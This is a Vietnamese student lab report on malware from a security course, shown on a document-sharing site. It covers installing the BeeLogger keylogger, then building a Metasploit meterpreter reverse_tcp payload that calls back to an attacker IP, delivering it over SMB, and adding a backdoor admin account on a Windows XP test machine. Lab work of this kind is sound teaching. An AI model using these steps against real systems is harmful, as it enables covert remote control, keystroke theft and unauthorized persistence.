1. Trang chủ
  2. » Luận Văn - Báo Cáo

Báo cáo an tòan thông tin lab 6 malware 2

14 2 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Báo cáo môn học: An toàn thông tin Lab 6 Malware
Tác giả Nguyễn Lê Gia Hân
Người hướng dẫn TS. Huỳnh Nguyên Chính
Trường học Trường Đại Học Sư Phạm Kỹ Thuật TP.HCM
Chuyên ngành Công nghệ thông tin
Thể loại Báo cáo
Năm xuất bản 2023
Thành phố TP. Hồ Chí Minh
Định dạng
Số trang 14
Dung lượng 4,77 MB

Nội dung

Keylogger- Download zip file keylogger: https://github.com/4w4k3/BeeLogger- Unzip: unzip BeeLogger-master.zip... - Chuyển cd vào folder: cd BeeLogger-master- Cài đặt file: ./install.sh+

Trang 1

TRƯNG ĐI HC SƯ PHM K THUÂT TP.HCM KHOA: CÔNG NGHỆ THÔNG TIN

BÁO CÁO MÔN HC: AN TÒAN THÔNG TIN

LAB 6

MALWARE

GVHD: TS.Huỳnh Nguyên Chính Sinh viên thực hiện: Nguyễn Lê Gia Hân MSSV: 21110432

Mã LHP: INSE330380_23_1_09

TP.Hồ Chí Minh, tháng 10 năm 2023

Trang 2

Lab 6 Malware

1 Keylogger

- Download zip file keylogger: https://github.com/4w4k3/BeeLogger

- Unzip: unzip BeeLogger-master.zip

Trang 3

- Chuyển cd vào folder: cd BeeLogger-master

- Cài đặt file: /install.sh

+ Chuyển quyền root và tăng quyền cho install.sh

+ /install.sh

Trang 4

- Khi cài đặt, nó sẽ tự cài đặt python

- Run file: python bee.py

Trang 5

- Chọn K để tạo keylogger

2 Malware

PHẦN MỀM ĐỘC HI

Chuẩn bị hệ thống

Tên Thiết bị Số lượng Ghi chú

PC Win XP 1 Test

Trang 6

Backtrack 5 r3

(192.168.2.136)

1 Dùng cho Attacker

- Cài đặt IP trên window XP

- Cài đặt IP trên Backtrack 5r3

Trang 7

Bước 1: truy cập vào thư mục /pentest/exploits/framwork

#cd /pentest/exploits/framework

Bước 2: Đánh lệnh msfconsole

#msfconsole

Trang 8

Bước 3: Tạo Virus có tên dev.exe

msf>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.136 LPORT=4444

X >/root/dev.exe

Bước 4: Thực hiện phát tán virus đến máy nạn nhân.

- Tạo folder SHARE trên máy nạn nhân

Trang 9

- Bật sharing

- Máy atcker : vào smb để chuyển file sang máy nạn nhân

Trang 10

Chuyển file thành công

Trang 11

Bước 5: Khai thác máy nạn nhân

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp set LHOST 192.168.2.136

set LPORT 4444

exploit

Sau khi nạn nhân chạy file dev.exe thu được backdoor

- Xem các lệnh đang running: ps

Trang 12

- Tạo thư mục trên máy nạn nhân:

meterpreter> mkdir C:/yahana_21110432

- Tạo user có quyền admin trên máy nạn nhân:

meterpreter> shell

net user GiaHan /add

net localgroup administrators GiaHan /add

Trang 13

Trên máy nạn nhân

Ngày đăng: 08/04/2024, 17:39

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w